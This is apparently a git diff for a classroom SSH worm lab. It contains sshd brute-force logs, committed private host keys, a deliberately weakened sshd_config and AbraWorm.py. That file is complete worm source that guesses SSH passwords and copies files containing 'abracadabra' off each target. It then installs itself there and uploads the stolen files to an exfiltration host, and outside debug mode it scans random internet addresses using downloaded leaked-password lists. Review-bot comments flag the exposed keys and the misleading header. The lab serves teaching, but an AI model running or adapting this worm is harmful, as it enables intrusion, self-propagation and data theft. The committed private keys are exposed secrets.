+2023-11-07 09:12:44.613713550 kex_exchange_identification: Connection closed by remote host +2023-11-07 09:12:44.613716633 Connection closed by 127.0.0.1 port 45732 +2023-11-07 09:15:21.527283762 Invalid user admin from 172.18.0.1 port 63422 +2023-11-07 09:15:22.562802095 Could not get shadow information for NOUSER +2023-11-07 09:15:22.574269512 Failed password for invalid user admin from 172.18.0.1 port 63422 ssh2 +2023-11-07 09:15:22.627625220 Invalid user account from 172.18.0.1 port 63424 +2023-11-07 09:15:23.666964263 Could not get shadow information for NOUSER +2023-11-07 09:15:23.674297221 Failed password for invalid user account from 172.18.0.1 port 63424 ssh2 +2023-11-07 09:15:23.720934096 Invalid user vagrant from 172.18.0.1 port 63426 +2023-11-07 09:15:24.751163971 Could not get shadow information for NOUSER +2023-11-07 09:15:24.764497263 Failed password for invalid user vagrant from 172.18.0.1 port 63426 ssh2 +2023-11-07 09:15:24.825037346 Invalid user kali from 172.18.0.1 port 63428 +2023-11-07 09:15:25.854998555 Could not get shadow information for NOUSER +2023-11-07 09:15:25.866632055 Failed password for invalid user kali from 172.18.0.1 port 63428 ssh2 +2023-11-07 09:15:26.961224166 Accepted password for user from 172.18.0.1 port 63430 ssh2 +2023-11-07 09:15:28.164384834 Connection closed by invalid user account 172.18.0.1 port 63424 [preauth] +2023-11-07 09:15:28.164387959 Connection closed by invalid user vagrant 172.18.0.1 port 63426 [preauth] +2023-11-07 09:15:28.164390792 Connection closed by invalid user admin 172.18.0.1 port 63422 [preauth] +2023-11-07 09:15:28.164391584 Connection closed by invalid user kali 172.18.0.1 port 63428 [preauth] +2023-11-07 09:17:58.152928250 Invalid user admin from 172.18.0.1 port 62914 +2023-11-07 09:17:59.191686251 Could not get shadow information for NOUSER +2023-11-07 09:17:59.202703501 Failed password for invalid user admin from 172.18.0.1 port 62914 ssh2 +2023-11-07 09:17:59.258322584 Invalid user account 
from 172.18.0.1 port 62916 +2023-11-07 09:18:00.289062501 Could not get shadow information for NOUSER +2023-11-07 09:18:00.301176168 Failed password for invalid user account from 172.18.0.1 port 62916 ssh2 +2023-11-07 09:18:00.344234751 Invalid user vagrant from 172.18.0.1 port 56078 +2023-11-07 09:18:01.372880294 Could not get shadow information for NOUSER +2023-11-07 09:18:01.390616794 Failed password for invalid user vagrant from 172.18.0.1 port 56078 ssh2 +2023-11-07 09:18:01.451014544 Invalid user kali from 172.18.0.1 port 56080 +2023-11-07 09:18:02.483192211 Could not get shadow information for NOUSER +2023-11-07 09:18:02.502678752 Failed password for invalid user kali from 172.18.0.1 port 56080 ssh2 +2023-11-07 09:18:03.597728920 Accepted password for user from 172.18.0.1 port 56082 ssh2 +2023-11-07 09:18:09.848681673 Connection closed by invalid user account 172.18.0.1 port 62916 [preauth] +2023-11-07 09:18:09.851578339 Connection closed by invalid user kali 172.18.0.1 port 56080 [preauth] +2023-11-07 09:18:09.851604756 Connection closed by invalid user vagrant 172.18.0.1 port 56078 [preauth] +2023-11-07 09:18:09.851605589 Connection closed by invalid user admin 172.18.0.1 port 62914 [preauth] +2023-11-07 09:19:40.981733090 Received signal 15; terminating. +2023-11-07 10:26:50.175887674 Server listening on 0.0.0.0 port 2222. +2023-11-07 10:26:50.175937633 Server listening on :: port 2222. 
+2023-11-07 10:26:51.206263550 kex_exchange_identification: Connection closed by remote host +2023-11-07 10:26:51.206266383 Connection closed by 127.0.0.1 port 51652 +2023-11-07 10:27:03.983907708 Invalid user admin from 172.18.0.1 port 58512 +2023-11-07 10:27:05.026391001 Could not get shadow information for NOUSER +2023-11-07 10:27:05.038054084 Failed password for invalid user admin from 172.18.0.1 port 58512 ssh2 +2023-11-07 10:27:05.093712876 Invalid user account from 172.18.0.1 port 63062 +2023-11-07 10:27:06.126270751 Could not get shadow information for NOUSER +2023-11-07 10:27:06.140345543 Failed password for invalid user account from 172.18.0.1 port 63062 ssh2 +2023-11-07 10:27:06.197442126 Invalid user vagrant from 172.18.0.1 port 63064 +2023-11-07 10:27:07.234654252 Could not get shadow information for NOUSER +2023-11-07 10:27:07.246939085 Failed password for invalid user vagrant from 172.18.0.1 port 63064 ssh2 +2023-11-07 10:27:07.297183335 Invalid user kali from 172.18.0.1 port 63066 +2023-11-07 10:27:08.334107835 Could not get shadow information for NOUSER +2023-11-07 10:27:08.351569002 Failed password for invalid user kali from 172.18.0.1 port 63066 ssh2 +2023-11-07 10:27:09.449011586 Accepted password for user from 172.18.0.1 port 63068 ssh2 +2023-11-07 10:27:15.700639381 Connection closed by invalid user account 172.18.0.1 port 63062 [preauth] +2023-11-07 10:27:15.700642714 Connection closed by invalid user admin 172.18.0.1 port 58512 [preauth] +2023-11-07 10:27:15.700646339 Connection closed by invalid user kali 172.18.0.1 port 63066 [preauth] +2023-11-07 10:27:15.702313006 Connection closed by invalid user vagrant 172.18.0.1 port 63064 [preauth] diff --git a/user/config/logs/openssh/lock b/user/config/logs/openssh/lock new file mode 100644 index 0000000..e69de29 diff --git a/user/config/logs/openssh/state b/user/config/logs/openssh/state new file mode 100644 index 0000000..e69de29 
diff --git a/user/config/ssh_host_keys/ssh_host_ecdsa_key b/user/config/ssh_host_keys/ssh_host_ecdsa_key new file mode 100644 index 0000000..2ec806d --- /dev/null +++ b/user/config/ssh_host_keys/ssh_host_ecdsa_key @@ -0,0 +1,9 @@ +-----BEGIN OPENSSH PRIVATE KEY----- +b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAaAAAABNlY2RzYS +1zaGEyLW5pc3RwMjU2AAAACG5pc3RwMjU2AAAAQQTTv/T/PIE5YWHIdfCWdp/09PnmfJow +CiUiHDv/EXogVtruvVv4nQ0e4jg168UBDZ0wt/TGC4pjnDwW3h3SmsjRAAAAuClmpmMpZq +ZjAAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNO/9P88gTlhYch1 +8JZ2n/T0+eZ8mjAKJSIcO/8ReiBW2u69W/idDR7iODXrxQENnTC39MYLimOcPBbeHdKayN +EAAAAhAMeKhouNJiFnVM3/PYyK7BMG/IHRWib9RFt1g0O2qg8QAAAAGHJvb3RAb3BlbnNz +aC1zZXJ2ZXItdXNlcgECAwQFBgc= +-----END OPENSSH PRIVATE KEY----- diff --git a/user/config/ssh_host_keys/ssh_host_ecdsa_key.pub b/user/config/ssh_host_keys/ssh_host_ecdsa_key.pub new file mode 100644 index 0000000..dc3b792 --- /dev/null +++ b/user/config/ssh_host_keys/ssh_host_ecdsa_key.pub @@ -0,0 +1 @@ +ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNO/9P88gTlhYch18JZ2n/T0+eZ8mjAKJSIcO/8ReiBW2u69W/idDR7iODXrxQENnTC39MYLimOcPBbeHdKayNE= root@openssh-server-user diff --git a/user/config/ssh_host_keys/ssh_host_ed25519_key b/user/config/ssh_host_keys/ssh_host_ed25519_key new file mode 100644 index 0000000..60fae66 --- /dev/null +++ b/user/config/ssh_host_keys/ssh_host_ed25519_key @@ -0,0 +1,7 @@ +-----BEGIN OPENSSH PRIVATE KEY----- +b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW +QyNTUxOQAAACAOvTrEihdSh3hCS8fp2/nj8W0HKI4gGjQeRz5W0lPLFgAAAKD7c6Ab+3Og +GwAAAAtzc2gtZWQyNTUxOQAAACAOvTrEihdSh3hCS8fp2/nj8W0HKI4gGjQeRz5W0lPLFg +AAAEB/Lxu1xdaGLKbXr00dXVo1KrIzfa4Fmj1QnO81cfFHJg69OsSKF1KHeEJLx+nb+ePx +bQcojiAaNB5HPlbSU8sWAAAAGHJvb3RAb3BlbnNzaC1zZXJ2ZXItdXNlcgECAwQF +-----END OPENSSH PRIVATE KEY----- 
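Review bot: This hunk commits a private host key (`ssh_host_ecdsa_key`), and the same applies to `ssh_host_ed25519_key` on this line and `ssh_host_rsa_key` under the next two headers; every instance built from the repository will share one host identity, and anyone with read access to the repository holds the secret half of it. Even for a throwaway lab the private halves should be generated at container start and kept out of version control, e.g. by adding `*/config/ssh_host_keys/ssh_host_*_key` to the `.gitignore` this commit introduces, keeping only the `.pub` files if a pinned fingerprint is wanted for `known_hosts`. Because the keys are already in history, the committed ones should be treated as exposed and regenerated rather than merely deleted in a later commit. If this is the linuxserver openssh-server image (the `/config/sshd.pid` and `ssh_host_keys` layout suggests it), missing host keys are recreated on first run, so no other change is needed — worth confirming against the image docs.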
diff --git a/user/config/ssh_host_keys/ssh_host_ed25519_key.pub b/user/config/ssh_host_keys/ssh_host_ed25519_key.pub new file mode 100644 index 0000000..1f1dc57 --- /dev/null +++ b/user/config/ssh_host_keys/ssh_host_ed25519_key.pub @@ -0,0 +1 @@ +ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIA69OsSKF1KHeEJLx+nb+ePxbQcojiAaNB5HPlbSU8sW root@openssh-server-user diff --git a/user/config/ssh_host_keys/ssh_host_rsa_key b/user/config/ssh_host_keys/ssh_host_rsa_key new file mode 100644 index 0000000..daa81ab --- /dev/null +++ b/user/config/ssh_host_keys/ssh_host_rsa_key 
@@ -0,0 +1,38 @@ +-----BEGIN OPENSSH PRIVATE KEY----- +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 +-----END OPENSSH PRIVATE KEY----- diff --git a/user/config/ssh_host_keys/ssh_host_rsa_key.pub b/user/config/ssh_host_keys/ssh_host_rsa_key.pub new file mode 100644 index 0000000..8893e1e --- /dev/null +++ b/user/config/ssh_host_keys/ssh_host_rsa_key.pub @@ -0,0 +1 @@ +ssh-rsa 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 root@openssh-server-user diff --git a/user/config/ssh_host_keys/sshd_config b/user/config/ssh_host_keys/sshd_config new file mode 100644 index 0000000..be594bd --- /dev/null +++ b/user/config/ssh_host_keys/sshd_config 
@@ -0,0 +1,117 @@
+# $OpenBSD: sshd_config,v 1.104 2021/07/02 05:11:21 dtucker Exp $
+
+# This is the sshd server system-wide configuration file. See
+# sshd_config(5) for more information.
+
+# This sshd was compiled with PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
+
+# The strategy used for options in the default sshd_config shipped with
+# OpenSSH is to specify options with their default value where
+# possible, but leave them commented. Uncommented options override the
+# default value.
+
+Port 2222
+#AddressFamily any
+#ListenAddress 0.0.0.0
+#ListenAddress ::
+
+#HostKey /etc/ssh/ssh_host_rsa_key
+#HostKey /etc/ssh/ssh_host_ecdsa_key
+#HostKey /etc/ssh/ssh_host_ed25519_key
+
+# Ciphers and keying
+#RekeyLimit default none
+
+# Logging
+#SyslogFacility AUTH
+#LogLevel INFO
+
+# Authentication:
+
+#LoginGraceTime 2m
+#PermitRootLogin prohibit-password
+#StrictModes yes
+#MaxAuthTries 2147483647
+#MaxSessions 10
+
+#PubkeyAuthentication yes
+
+# The default is to check both .ssh/authorized_keys and .ssh/authorized_keys2
+# but this is overridden so installations will only check .ssh/authorized_keys
+AuthorizedKeysFile .ssh/authorized_keys
+
+#AuthorizedPrincipalsFile none
+
+#AuthorizedKeysCommand none
+#AuthorizedKeysCommandUser nobody
+
+# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts
+#HostbasedAuthentication no
+# Change to yes if you don't trust ~/.ssh/known_hosts for
+# HostbasedAuthentication
+#IgnoreUserKnownHosts no
+# Don't read the user's ~/.rhosts and ~/.shosts files
+#IgnoreRhosts yes
+
+# To disable tunneled clear text passwords, change to no here!
+PasswordAuthentication yes
+#PermitEmptyPasswords no
+
+# Change to no to disable s/key passwords
+#KbdInteractiveAuthentication yes
+
+# Kerberos options
+#KerberosAuthentication no
+#KerberosOrLocalPasswd yes
+#KerberosTicketCleanup yes
+#KerberosGetAFSToken no
+
+# GSSAPI options
+#GSSAPIAuthentication no
+#GSSAPICleanupCredentials yes
+
+# Set this to 'yes' to enable PAM authentication, account processing,
+# and session processing. If this is enabled, PAM authentication will
+# be allowed through the KbdInteractiveAuthentication and
+# PasswordAuthentication. Depending on your PAM configuration,
+# PAM authentication via KbdInteractiveAuthentication may bypass
+# the setting of "PermitRootLogin prohibit-password".
+# If you just want the PAM account and session checks to run without
+# PAM authentication, then enable this but set PasswordAuthentication
+# and KbdInteractiveAuthentication to 'no'.
+#UsePAM no
+
+#AllowAgentForwarding yes
+# Feel free to re-enable these if your use case requires them.
+AllowTcpForwarding no
+GatewayPorts no
+X11Forwarding no
+#X11DisplayOffset 10
+#X11UseLocalhost yes
+#PermitTTY yes
+#PrintMotd yes
+#PrintLastLog yes
+#TCPKeepAlive yes
+#PermitUserEnvironment no
+#Compression delayed
+#ClientAliveInterval 0
+#ClientAliveCountMax 3
+#UseDNS no
+PidFile /config/sshd.pid
+#MaxStartups 10:30:100
+#PermitTunnel no
+#ChrootDirectory none
+#VersionAddendum none
+
+# no default banner path
+#Banner none
+
+# override default of no subsystems
+Subsystem sftp internal-sftp
+
+# Example of overriding settings on a per-user basis
+#Match User anoncvs
+# X11Forwarding no
+# AllowTcpForwarding no
+# PermitTTY no
+# ForceCommand cvs server
diff --git a/user/config/sshd.pid b/user/config/sshd.pid
new file mode 100644
index 0000000..f07e286
--- /dev/null
+++ b/user/config/sshd.pid
@@ -0,0 +1 @@
+175
diff --git a/user/config/test.txt b/user/config/test.txt
new file mode 100644
index 0000000..019bad6
--- /dev/null
+++ b/user/config/test.txt
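Review bot: Nothing in this copy of `sshd_config` says that it is a deliberately weakened lab target, even though it departs from the stock file in exactly that direction (`Port 2222`, `PasswordAuthentication yes`, and an edited `MaxAuthTries` value). A reader who copies it as a starting point for a real host inherits those choices silently, and nothing ties the file to the worm demo it serves. Add a header line after the `$OpenBSD` marker such as `# Target container for the AbraWorm lab: password logins enabled on purpose; not a hardening reference.` so the intent is recorded next to the settings.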
@@ -0,0 +1,2 @@
+abracadabra
+File di esempio che verrebbe esfiltrato
diff --git a/user/init-scripts/disable-maxauth.sh b/user/init-scripts/disable-maxauth.sh
new file mode 100755
index 0000000..98dd8f5
--- /dev/null
+++ b/user/init-scripts/disable-maxauth.sh
@@ -0,0 +1,4 @@
+#!/bin/bash
+
+echo "*** DISABLING MaxAuthTries ***"
+sed -i 's/MaxAuthTries .*/MaxAuthTries 2147483647/g' /etc/ssh/sshd_config
diff --git a/worm/AbraWorm.py b/worm/AbraWorm.py
new file mode 100644
index 0000000..ee7b466
--- /dev/null
+++ b/worm/AbraWorm.py
@@ -0,0 +1,285 @@ +#!/usr/bin/env python + +### AbraWorm.py + +### Author: Avi kak (kak@purdue.edu) +### Date: April 8, 2016 + +## This is a harmless worm meant for educational purposes only. It can +## only attack machines that run SSH servers and those too only under +## very special conditions that are described below. Its primary features +## are: +## +## -- It tries to break in with SSH login into a randomly selected set of +## hosts with a randomly selected set of usernames and with a randomly +## chosen set of passwords. +## +## -- If it can break into a host, it looks for the files that contain the +## string `abracadabra'. It downloads such files into the host where +## the worm resides. +## +## -- It uploads the files thus exfiltrated from an infected machine to a +## designated host in the internet. You'd need to supply the IP address +## and login credentials at the location marked yyy.yyy.yyy.yyy in the +## code for this feature to work. The exfiltrated files would be +## uploaded to the host at yyy.yyy.yyy.yyy. If you don't supply this +## information, the worm will still work, but now the files exfiltrated +## from the infected machines will stay at the host where the worm +## resides. For an actual worm, the host selected for yyy.yyy.yyy.yyy +## would be a previosly infected host. +## +## -- It installs a copy of itself on the remote host that it successfully +## breaks into. If a user on that machine executes the file thus +## installed (say by clicking on it), the worm activates itself on +## that host. +## +## -- Once the worm is launched in an infected host, it runs in an +## infinite loop, looking for vulnerable hosts in the internet. By +## vulnerable I mean the hosts for which it can successfully guess at +## least one username and the corresponding password. +## +## -- IMPORTANT: After the worm has landed in a remote host, the worm can +## be activated on that machine only if Python is installed on that +## machine. 
Another condition that must hold at the remote machine is +## that it must have the Python modules paramiko and scp installed. +## +## -- The username and password construction strategies used in the worm +## are highly unlikely to result in actual usernames and actual +## passwords anywhere. (However, for demonstrating the worm code in +## an educational program, this part of the code can be replaced with +## a more potent algorithm.) +## +## -- Given all of the conditions I have listed above for this worm to +## propagate into the internet, we can be quite certain that it is not +## going to cause any harm. Nonetheless, the worm should prove useful +## as an educational exercise. +## +## +## If you want to play with the worm, run it first in the `debug' mode. +## For the debug mode of execution, you would need to supply the following +## information to the worm: +## +## 1) Change to 1 the value of the variable $debug. +## +## 2) Provide an IP address and the login credentials for a host that you +## have access to and that contains one or more documents that +## include the string "abracadabra". This information needs to go +## where you see xxx.xxx.xxx.xxx in the code. +## +## 3) Provide an IP address and the login credentials for a host that +## will serve as the destination for the files exfiltrated from the +## successfully infected hosts. The IP address and the login +## credentials go where you find the string yyy.yyy.yyy.yyy in the +## code. +## +## After you have executed the worm code, you will notice that a copy of +## the worm has landed at the host at the IP address you used for +## xxx.xxx.xxx.xxx and you'll see a new directory at the host you used for +## yyy.yyy.yyy.yyy. This directory will contain those files from the +## xxx.xxx.xxx.xxx host that contained the string `abracadabra'. 
+ +import sys +import os +import random +import paramiko +import scp +import select +import signal +import requests +import time + +users = None +passwords = None + + +## You would want to uncomment the following two lines for the worm to +## work silently: +#sys.stdout = open(os.devnull, 'w') +#sys.stderr = open(os.devnull, 'w') + +def sig_handler(signum,frame): os.kill(os.getpid(),signal.SIGKILL) +signal.signal(signal.SIGINT, sig_handler) + +debug = 1 # IMPORTANT: Before changing this setting, read the last + # paragraph of the main comment block above. As + # mentioned there, you need to provide two IP + # addresses in order to run this code in debug + # mode. + +## The following numbers do NOT mean that the worm will attack only 3 +## hosts for 3 different usernames and 3 different passwords. Since the +## worm operates in an infinite loop, at each iteration, it generates a +## fresh batch of hosts, usernames, and passwords. +NHOSTS = NUSERNAMES = NPASSWDS = 3 + +def get_password_list(): + if debug == 1: return ['password', 'adjfhfad', 'idhf', 'dhf931f'] + r = requests.get('https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Leaked-Databases/rockyou-75.txt') + return r.text.split('\n') + +def get_user_list(): + if debug == 1: return ['test', 'user', 'mario', 'matteo'] + r = requests.get('https://raw.githubusercontent.com/jeanphorn/wordlist/master/usernames.txt') + return r.text.split("\n") + +def get_new_usernames(how_many): + global users + if debug == 1: return ["admin", "account", "vagrant", "kali", "user", "adaliah", "adversary"] + if how_many == 0: return 0 + users = users if users else get_user_list() + return random.sample(users,how_many) + +def get_new_passwds(how_many): + global passwords + if how_many == 0: return 0 + passwords = passwords if passwords else get_password_list() + if debug == 1: return passwords[:100] + return random.sample(passwords,how_many) + +def get_fresh_ipaddresses(how_many): + if debug == 1: return 
["127.0.0.1"] + if how_many == 0: return 0 + ipaddresses = [] + for i in range(how_many): + first,second,third,fourth = map(lambda x: str(1 + random.randint(0,x)), [223,223,223,223]) + ipaddresses.append( first + '.' + second + '.' + third + '.' + fourth ) + return ipaddresses + +def run_ssh_command(ssh, cmd): + + _, stdout_, stderr_ = ssh.exec_command(cmd) + + stdout_.channel.recv_exit_status() + stderr_.channel.recv_exit_status() + + out = stdout_.readlines() + err = stderr_.readlines() + + if debug == 1: + print(f'\tstdout:{out}') + if len(stderr_.readlines()) > 0: + print(f'\tstderr:{err}') + return [] + + return out + +# For the same IP address, we do not want to loop through multiple user +# names and passwords consecutively since we do not want to be quarantined +# by a tool like DenyHosts at the other end. So let's reverse the order +# of looping. +def main(): + while True: + usernames = get_new_usernames(NUSERNAMES) + passwds = get_new_passwds(NPASSWDS) + # print("usernames: %s" % str(usernames)) + # print("passwords: %s" % str(passwds)) + # First loop over passwords + for passwd in passwds: + # Then loop over user names + for user in usernames: + # And, finally, loop over randomly chosen IP addresses + for ip_address in get_fresh_ipaddresses(NHOSTS): + host = f'{user}@{ip_address}' + print(f'{host} -> {passwd}') + files_of_interest_at_target = [] + try: + ssh = paramiko.SSHClient() + ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) + ssh.connect(ip_address,port=22,username=user,password=passwd,timeout=5) + print(f'Connected {user}@{ip_address} -> {passwd}') + + # Let's make sure that the target host was not previously + # infected: + received_list = None + cmd = 'ls' + print(f'[{host}] executing: {cmd}') + received_list = run_ssh_command(ssh, cmd) + + if not received_list: + next + + print(f'Checking if target is already infected') + if debug == 1: time.sleep(5) + if ''.join(received_list).find('AbraWorm') >= 0: + print(f'{host} already infected, 
found AbraWorm in {received_list}') + next + else: + print(f'{host} not infected') + + # Now let's look for files that contain the string 'abracadabra' + cmd = 'grep -ls abracadabra *' + print(f'Checking for interesting files') + print(f'[{host}] executing: {cmd}') + if debug == 1: time.sleep(5) + received_list = run_ssh_command(ssh, cmd) + + if not received_list: + next + + for item in received_list: + files_of_interest_at_target.append(item.strip()) + print(f'Files of interest at the target: {files_of_interest_at_target}') + if debug == 1: time.sleep(5) + + scpcon = scp.SCPClient(ssh.get_transport()) + if len(files_of_interest_at_target) > 0: + for target_file in files_of_interest_at_target: + print(f'[DEBUG] Copy file {target_file}') + if debug == 1: time.sleep(5) + scpcon.get(target_file) + + # Now deposit a copy of AbraWorm.py at the target host: + print(f'[DEBUG] Copy AbraWorm in target') + scpcon.put(sys.argv[0]) + scpcon.close() + if debug == 1: time.sleep(5) + + print(f'[DEBUG] Cheking {host} for worm deploy, executing: {cmd}') + received_list = run_ssh_command(ssh, cmd) + print(f'{received_list}') + if debug == 1: time.sleep(5) + + except Exception as e: + print(f'Exception catched: {e}') + next + + # Now upload the exfiltrated files to a specially designated host, + # which can be a previously infected host. The worm will only + # use those previously infected hosts as destinations for + # exfiltrated files if it was able to send the login credentials + # used on those hosts to its human masters through, say, a + # secret IRC channel. 
(See Lecture 29 on IRC) + if len(files_of_interest_at_target) > 0: + print(f'Will now try to exfiltrate the files') + if debug == 1: time.sleep(5) + try: + ssh = paramiko.SSHClient() + ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) + + # For exfiltration demo to work, you must provide an IP address and the login + # credentials in the next statement: + ssh.connect('127.0.0.1',port=12345,username='seed',password='dees',timeout=5) + scpcon = scp.SCPClient(ssh.get_transport()) + print(f'Connected to exhiltration host') + + for filename in files_of_interest_at_target: + scpcon.put(filename) + scpcon.close() + + if debug == 1: time.sleep(5) + print(f'Summary') + print(f'Extracting file:') + for filename in files_of_interest_at_target: + print(f'- (unknown)') + + + except: + print("No uploading of exfiltrated files\n") + next + + if debug == 1: + return + + +if __name__ == "__main__": + main()
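Review bot: The module header no longer describes this file: it states that the username and password strategies are "highly unlikely to result in actual usernames and actual passwords" and that targets must be filled in at `xxx.xxx.xxx.xxx`/`yyy.yyy.yyy.yyy`, but `get_password_list` and `get_user_list` now download real leaked-credential wordlists from GitHub whenever `debug != 1`, and both the targets and the exfiltration host are hardcoded to `127.0.0.1` with fixed credentials. The original author's harmlessness argument therefore does not carry over to this version, and a reader following the header's setup steps will not find the placeholders it refers to. Rewrite the header to describe the actual behaviour — lab-local targets, the wordlist download outside debug mode, and that `debug = 1` is what keeps a run confined to the lab containers — and drop the `(See Lecture 29 on IRC)` reference, which appears to have no counterpart in this repository.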